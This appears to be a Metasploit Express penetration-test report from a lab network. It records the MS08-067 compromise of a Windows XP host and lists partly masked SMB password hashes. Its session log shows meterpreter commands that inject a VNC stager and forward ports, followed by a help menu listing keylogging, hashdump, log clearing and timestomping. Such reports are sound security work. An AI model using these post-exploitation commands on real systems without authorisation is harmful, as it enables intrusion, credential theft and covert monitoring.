Back to Reports

Detailed Audit Report

Executive Summary

Project Summary

Name:Test1
Started:2010-06-02 01:42:19 UTC
Completed:2010-06-02 02:49:27 UTC
Users:admin

This report contains the results of a security audit performed by Metasploit Express from Rapid7 LLC. It contains confidential information about the state of your network. Access to this information by unauthorized personnel may allow them to compromise your network.

During this test, 3 hosts with a total of 10 exposed services were discovered. Of these, 1 were compromised and 6 passwords were obtained. The most common module used to compromise systems among 75 unique modules was exploit/windows/smb/ms08_067_netapi (1 sessions). From the compromised systems, 4 data files were obtained, including 1 screenshot.

Detailed Audit Report Summary

This report contains the details of all hosts discovered during the penetration test. It lists major findings, hosts discovered, and details of sessions opened during the penetration test.

Major Findings

This section lists high-priority problems including host compromises and discovered passwords.

Compromised hosts by address
Compromised System Attack Module Session Information Vulnerability References
192.168.56.101 exploit/windows/smb/ms08_067_netapi CVE-2008-4250, OSVDB-49243, MSB-MS08-067, Rapid7 Vulnerability DB

Authentication Tokens

Address Type User Password or Hash Additional Information
192.168.56.101 smb admin e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef
192.168.56.101 smb Administrator e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef
192.168.56.101 smb Guest e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef
192.168.56.101 smb HelpAssistant e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef
192.168.56.101 smb SUPPORT_388945a0 e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef
192.168.56.101 smb test e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef

Discovery

Discovered hosts
Address Hostname OS Name Services Vulns Files Notes Compromised?
192.168.56.101 asdf-b9ca10e6b9 Microsoft Windows XP 5 1 4 10 yes
192.168.56.1 Linux (Ubuntu) 2 2 no
192.168.56.102 Linux (Ubuntu) 3 2 no

Discovery - Host Details

192.168.56.101 - asdf-b9ca10e6b9

Discovered: 2010-06-02 01:44:28 UTC
Operating System: Microsoft Windows XP
Ethernet Address: 00:00:00:c1:1b:08
System Type: client

Authentication Tokens

Time Address Type User Password or Hash Additional Information
2010-06-02 02:44:36 UTC 192.168.56.101 smb admin e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef
2010-06-02 02:44:36 UTC 192.168.56.101 smb Administrator e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef
2010-06-02 02:44:36 UTC 192.168.56.101 smb Guest e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef
2010-06-02 02:44:36 UTC 192.168.56.101 smb HelpAssistant e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef
2010-06-02 02:44:36 UTC 192.168.56.101 smb SUPPORT_388945a0 e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef
2010-06-02 02:44:36 UTC 192.168.56.101 smb test e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef

Successful Attacks
Time ID Exploit Information
2010-06-02 02:39:54 UTC 1 (x19vv6ji) exploit/windows/smb/ms08_067_netapi

Exploited Vulnerabilities

Microsoft Server Service Relative Path Stack Corruption

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.


host.windows.screenshot created at 2010-06-02 02:44:37 UTC

Active Services

Name Port Service Information
ntp 123/udp Microsoft NTP
msrpc 135/tcp
netbios 137/udp ASDF-B9CA10E6B9:<00>:U :WORKGROUP:<00>:G :ASDF-B9CA10E6B9:<20>:U :WORKGROUP:<1e>:G :WORKGROUP:<1d>:U :__MSBROWSE__:<01>:G :08:00:00:00:0:08
smb 139/tcp
smb 445/tcp Windows XP Service Pack 2 (language: English) (name:ASDF-B9CA10E6B9) (domain:WORKGROUP)

192.168.56.1 - Unknown

Discovered: 2010-06-02 01:44:28 UTC
Operating System: Linux (Ubuntu)
Ethernet Address:
System Type: server

Active Services

Name Port Service Information
ssh 22/tcp SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu3
http 80/tcp Apache/2.2.14 (Ubuntu)

192.168.56.102 - Unknown

Discovered: 2010-06-02 01:44:28 UTC
Operating System: Linux (Ubuntu)
Ethernet Address: 08:00:27:41:28:FD
System Type: server

Active Services

Name Port Service Information
ssh 22/tcp SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1.2
ntp 123/udp NTP v4 (unsynchronized)
http 8080/tcp Mongrel 1.1.3


Session Details

192.168.56.101

Session ID x19vv6ji, created by exploit/windows/smb/ms08_067_netapi

Event Time Event Type Session Data
Jun 02 02:39:54 session_open  
Jun 02 02:39:56 session_command 
use stdapi
Jun 02 02:39:57 session_command 
use priv
Jun 02 02:45:31 session_command 
run vnc -O -t -i -c -V -p 58240 -v 50679
Jun 02 02:45:32 session_output 
[*] Creating a VNC bind tcp stager: RHOST=127.0.0.1 LPORT=58240
[*] Running payload handler
Jun 02 02:45:33 session_command 
portfwd add -L 127.0.0.1 -l 58240 -p 58240 -r 127.0.0.1
Jun 02 02:49:04 session_output 
[*] Host process notepad.exe has PID 3880
[*] Allocated memory at address 0x003a0000, for 298 byte stager
[*] Writing the VNC stager into memory...
[*] Starting the port forwarding from 58240 => TARGET:58240
[*] Local TCP relay created: 127.0.0.1:58240 <-> 127.0.0.1:58240
Jun 02 02:49:26 session_command 
help
Jun 02 02:49:27 session_output 
Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bgkill        Kills a background meterpreter script
    bglist        Lists running background scripts
    bgrun         Executes a meterpreter script as a background thread
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    run           Executes a meterpreter script
    use           Load a one or more meterpreter extensions
    write         Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Get as many privileges as possible
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes